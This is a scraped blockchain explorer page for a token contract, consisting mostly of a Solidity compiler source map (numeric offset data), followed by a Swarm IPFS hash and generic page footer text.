9164:30;9230:34;9210:18;;;9203:62;-1:-1:-1;;;9281:18:1;;;9274:45;9336:19;;21351:155:0;8950:411:1;21351:155:0;21589:9;;-1:-1:-1;;;;;7732:18:0;;7705:7;7732:18;;;;;;;;;;;21563:22;;:6;:22;:::i;:::-;:35;;21529:152;;;;-1:-1:-1;;;21529:152:0;;9568:2:1;21529:152:0;;;9550:21:1;9607:2;9587:18;;;9580:30;9646:33;9626:18;;;9619:61;9697:18;;21529:152:0;9366:355:1;21529:152:0;21241:1114;;;21785:6;-1:-1:-1;;;;;21779:12:0;:2;-1:-1:-1;;;;;21779:12:0;;:41;;;;-1:-1:-1;;;;;;21796:24:0;;;;;;:18;:24;;;;;;;;21795:25;21779:41;21753:602;;;21907:7;;21897:6;:17;;21863:152;;;;-1:-1:-1;;;21863:152:0;;9928:2:1;21863:152:0;;;9910:21:1;9967:2;9947:18;;;9940:30;10006:34;9986:18;;;9979:62;-1:-1:-1;;;10057:18:1;;;10050:47;10114:19;;21863:152:0;9726:413:1;21753:602:0;-1:-1:-1;;;;;22068:22:0;;;;;;:18;:22;;;;;;;;22067:23;:73;;;;-1:-1:-1;;;;;;22116:24:0;;;;;;:18;:24;;;;;;;;22115:25;22067:73;22041:314;;;22243:9;;-1:-1:-1;;;;;7732:18:0;;7705:7;7732:18;;;;;;;;;;;22217:22;;:6;:22;:::i;:::-;:35;;22183:152;;;;-1:-1:-1;;;22183:152:0;;9568:2:1;22183:152:0;;;9550:21:1;9607:2;9587:18;;;9580:30;9646:33;9626:18;;;9619:61;9697:18;;22183:152:0;9366:355:1;22183:152:0;22440:4;22391:28;7732:18;;;;;;;;;;;22496:10;;22472:34;;;;;;;22535:35;;-1:-1:-1;22559:11:0;;;;;;;22535:35;:61;;;;-1:-1:-1;22588:8:0;;;;;;;22587:9;22535:61;:100;;;;;22622:13;;22613:6;:22;22535:100;:135;;;;;22663:6;-1:-1:-1;;;;;22655:14:0;:4;-1:-1:-1;;;;;22655:14:0;;22653:17;22535:135;:176;;;;-1:-1:-1;;;;;;22688:23:0;;;;;;:17;:23;;;;;;;;22687:24;22535:176;:215;;;;-1:-1:-1;;;;;;22729:21:0;;;;;;:17;:21;;;;;;;;22728:22;22535:215;22517:343;;;22777:8;:15;;-1:-1:-1;;22777:15:0;;;;;22807:10;:8;:10::i;:::-;22832:8;:16;;-1:-1:-1;;22832:16:0;;;22517:343;-1:-1:-1;;;;;22904:23:0;;22870:12;22904:23;;;:17;:23;;;;;;22885:4;;22904:23;;;:48;;-1:-1:-1;;;;;;22931:21:0;;;;;;:17;:21;;;;;;;;22904:48;22900:96;;;-1:-1:-1;22979:5:0;22900:96;23006:12;23037:7;23033:589;;;23064:12;;;;;;;23061:66;;;23095:15;:13;:15::i;:::-;23172:6;-1:-1:-1;;;;;23166:12:0;:2;-1:-1:-1;;;;;23166:12:0;;:27;;;;;23192:1;23182:7;;:11;23166:27;23162:315;;;23242:3;23231:7;;23222:6;:16;;;;:::i;:::-;23221:24;;;;:::i;:::-;23214:31;;23280:4;23264:12;;:20;;;;;;;:::i;:::-;;;;-1:-1:-1;23162:315:0;;-1:-1:-1;23162:315:0;;23351:6;-1:-1:-1;;;;;23343:14:0;:4;-1:-1:-1;;;;;23343:14:0;;:28;;;;;23370:1;23361:6;;:10;23343:28;23339:138;;;23419:3;23409:6;;23400;:15;;;;:::i;:::-;23399:23;;;;:::i;:::-;23392:30;;23457:4;23441:12;;:20;;;;;;;:::i;:::-;;;;-1:-1:-1;;23339:138:0;23495:8;;23491:91;;23524:42;23540:4;23554;23561;23524:15;:42::i;:::-;23596:14;23606:4;23596:14;;:::i;:::-;;;23033:589;23632:33;23648:4;23654:2;23658:6;23632:15;:33::i;:::-;20415:3258;;;;20302:3371;;;:::o;1373:132::-;1281:6;;-1:-1:-1;;;;;1281:6:0;506:10;1437:23;1429:68;;;;-1:-1:-1;;;1429:68:0;;10874:2:1;1429:68:0;;;10856:21:1;;;10893:18;;;10886:30;10952:34;10932:18;;;10925:62;11004:18;;1429:68:0;10672:356:1;2468:191:0;2561:6;;;-1:-1:-1;;;;;2578:17:0;;;-1:-1:-1;;;;;;2578:17:0;;;;;;;2611:40;;2561:6;;;2578:17;2561:6;;2611:40;;2542:16;;2611:40;2531:128;2468:191;:::o;15220:289::-;-1:-1:-1;;;;;15335:19:0;;15327:28;;;;;;-1:-1:-1;;;;;15374:21:0;;15366:30;;;;;18857:451;18940:4;18896:23;7732:18;;;;;;;;;;;18983:12;;19012:20;;;:41;;-1:-1:-1;19036:17:0;;19012:41;19008:80;;;19070:7;;18857:451::o;19008:80::-;19122:10;;19104:15;:28;19100:89;;;19167:10;;19149:28;;19100:89;19203:33;19220:15;19203:16;:33::i;:::-;19257:10;;19249:51;;-1:-1:-1;;;;;19257:10:0;;;;;;;;;19278:21;19249:51;;;;;;;;;19278:21;19257:10;19249:51;;;;;;;;;;;;;;;;;;;;;18885:423;;18857:451::o;19703:437::-;19784:1;19770:11;;:15;19748:68;;;;-1:-1:-1;;;19748:68:0;;11235:2:1;19748:68:0;;;11217:21:1;11274:2;11254:18;;;11247:30;-1:-1:-1;;;11293:18:1;;;11286:46;11349:18;;19748:68:0;11033:340:1;19748:68:0;19900:11;;19850:12;;19827:20;;19900:15;;19914:1;19900:15;:::i;:::-;19873:42;;19945:16;19929:12;:32;19926:206;;19987:2;19978:6;:11;;;20004:7;:12;19737:403;;19703:437::o;19926:206::-;20058:1;20049:6;:10;;;20074:7;:11;20100:12;:20;;-1:-1:-1;;20100:20:0;;;19737:403;;19703:437::o;11789:806::-;-1:-1:-1;;;;;11886:18:0;;11878:68;;;;-1:-1:-1;;;11878:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;11965:16:0;;11957:64;;;;-1:-1:-1;;;11957:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;12107:15:0;;12085:19;12107:15;;;;;;;;;;;12141:21;;;;12133:72;;;;-1:-1:-1;;;12133:72:0;;11580:2:1;12133:72:0;;;11562:21:1;11619:2;11599:18;;;11592:30;11658:34;11638:18;;;11631:62;-1:-1:-1;;;11709:18:1;;;11702:36;11755:19;;12133:72:0;11378:402:1;12133:72:0;-1:-1:-1;;;;;12241:15:0;;;:9;:15;;;;;;;;;;;12259:20;;;12241:38;;12459:13;;;;;;;;;;:23;;;;;;12511:26;;160:25:1;;;12459:13:0;;12511:26;;133:18:1;12511:26:0;;;;;;;12550:37;18857:451;19314:383;19404:16;;;19418:1;19404:16;;;;;;;;19380:21;;19404:16;;;;;;;;;;-1:-1:-1;19404:16:0;19380:40;;19449:4;19431;19436:1;19431:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;19431:23:0;;;-1:-1:-1;;;;;19431:23:0;;;;;16859:42;-1:-1:-1;;;;;19475:11:0;;:13;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;19465:4;19470:1;19465:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;19465:23:0;;;:7;;;;;;;;;;;:23;19501:188;;-1:-1:-1;;;19501:188:0;;16859:42;;19501:57;;:188;;19573:11;;19599:1;;19616:4;;19643;;19663:15;;19501:188;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19369:328;19314:383;:::o;196:548:1:-;308:4;337:2;366;355:9;348:21;398:6;392:13;441:6;436:2;425:9;421:18;414:34;466:1;476:140;490:6;487:1;484:13;476:140;;;585:14;;;581:23;;575:30;551:17;;;570:2;547:26;540:66;505:10;;476:140;;;480:3;665:1;660:2;651:6;640:9;636:22;632:31;625:42;735:2;728;724:7;719:2;711:6;707:15;703:29;692:9;688:45;684:54;676:62;;;;196:548;;;;:::o;749:131::-;-1:-1:-1;;;;;824:31:1;;814:42;;804:70;;870:1;867;860:12;885:315;953:6;961;1014:2;1002:9;993:7;989:23;985:32;982:52;;;1030:1;1027;1020:12;982:52;1069:9;1056:23;1088:31;1113:5;1088:31;:::i;:::-;1138:5;1190:2;1175:18;;;;1162:32;;-1:-1:-1;;;885:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2255:247::-;2314:6;2367:2;2355:9;2346:7;2342:23;2338:32;2335:52;;;2383:1;2380;2373:12;2335:52;2422:9;2409:23;2441:31;2466:5;2441:31;:::i;:::-;2491:5;2255:247;-1:-1:-1;;;2255:247:1:o;2507:248::-;2575:6;2583;2636:2;2624:9;2615:7;2611:23;2607:32;2604:52;;;2652:1;2649;2642:12;2604:52;-1:-1:-1;;2675:23:1;;;2745:2;2730:18;;;2717:32;;-1:-1:-1;2507:248:1:o;2760:416::-;2825:6;2833;2886:2;2874:9;2865:7;2861:23;2857:32;2854:52;;;2902:1;2899;2892:12;2854:52;2941:9;2928:23;2960:31;2985:5;2960:31;:::i;:::-;3010:5;-1:-1:-1;3067:2:1;3052:18;;3039:32;3109:15;;3102:23;3090:36;;3080:64;;3140:1;3137;3130:12;3080:64;3163:7;3153:17;;;2760:416;;;;;:::o;3414:388::-;3482:6;3490;3543:2;3531:9;3522:7;3518:23;3514:32;3511:52;;;3559:1;3556;3549:12;3511:52;3598:9;3585:23;3617:31;3642:5;3617:31;:::i;:::-;3667:5;-1:-1:-1;3724:2:1;3709:18;;3696:32;3737:33;3696:32;3737:33;:::i;4039:380::-;4118:1;4114:12;;;;4161;;;4182:61;;4236:4;4228:6;4224:17;4214:27;;4182:61;4289:2;4281:6;4278:14;4258:18;4255:38;4252:161;;4335:10;4330:3;4326:20;4323:1;4316:31;4370:4;4367:1;4360:15;4398:4;4395:1;4388:15;4252:161;;4039:380;;;:::o;4424:127::-;4485:10;4480:3;4476:20;4473:1;4466:31;4516:4;4513:1;4506:15;4540:4;4537:1;4530:15;4556:125;4621:9;;;4642:10;;;4639:36;;;4655:18;;:::i;7070:401::-;7272:2;7254:21;;;7311:2;7291:18;;;7284:30;7350:34;7345:2;7330:18;;7323:62;-1:-1:-1;;;7416:2:1;7401:18;;7394:35;7461:3;7446:19;;7070:401::o;7476:399::-;7678:2;7660:21;;;7717:2;7697:18;;;7690:30;7756:34;7751:2;7736:18;;7729:62;-1:-1:-1;;;7822:2:1;7807:18;;7800:33;7865:3;7850:19;;7476:399::o;10144:168::-;10217:9;;;10248;;10265:15;;;10259:22;;10245:37;10235:71;;10286:18;;:::i;10317:217::-;10357:1;10383;10373:132;;10427:10;10422:3;10418:20;10415:1;10408:31;10462:4;10459:1;10452:15;10490:4;10487:1;10480:15;10373:132;-1:-1:-1;10519:9:1;;10317:217::o;10539:128::-;10606:9;;;10627:11;;;10624:37;;;10641:18;;:::i;11917:127::-;11978:10;11973:3;11969:20;11966:1;11959:31;12009:4;12006:1;11999:15;12033:4;12030:1;12023:15;12049:251;12119:6;12172:2;12160:9;12151:7;12147:23;12143:32;12140:52;;;12188:1;12185;12178:12;12140:52;12220:9;12214:16;12239:31;12264:5;12239:31;:::i;12305:980::-;12567:4;12615:3;12604:9;12600:19;12646:6;12635:9;12628:25;12672:2;12710:6;12705:2;12694:9;12690:18;12683:34;12753:3;12748:2;12737:9;12733:18;12726:31;12777:6;12812;12806:13;12843:6;12835;12828:22;12881:3;12870:9;12866:19;12859:26;;12920:2;12912:6;12908:15;12894:29;;12941:1;12951:195;12965:6;12962:1;12959:13;12951:195;;;13030:13;;-1:-1:-1;;;;;13026:39:1;13014:52;;13121:15;;;;13086:12;;;;13062:1;12980:9;12951:195;;;-1:-1:-1;;;;;;;13202:32:1;;;;13197:2;13182:18;;13175:60;-1:-1:-1;;;13266:3:1;13251:19;13244:35;13163:3;12305:980;-1:-1:-1;;;12305:980:1:o
Swarm Source
ipfs://c197a060a5f9d0b7b037bd2eba2db3fa9cb9afc966059fb85863f668c70e40cd
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.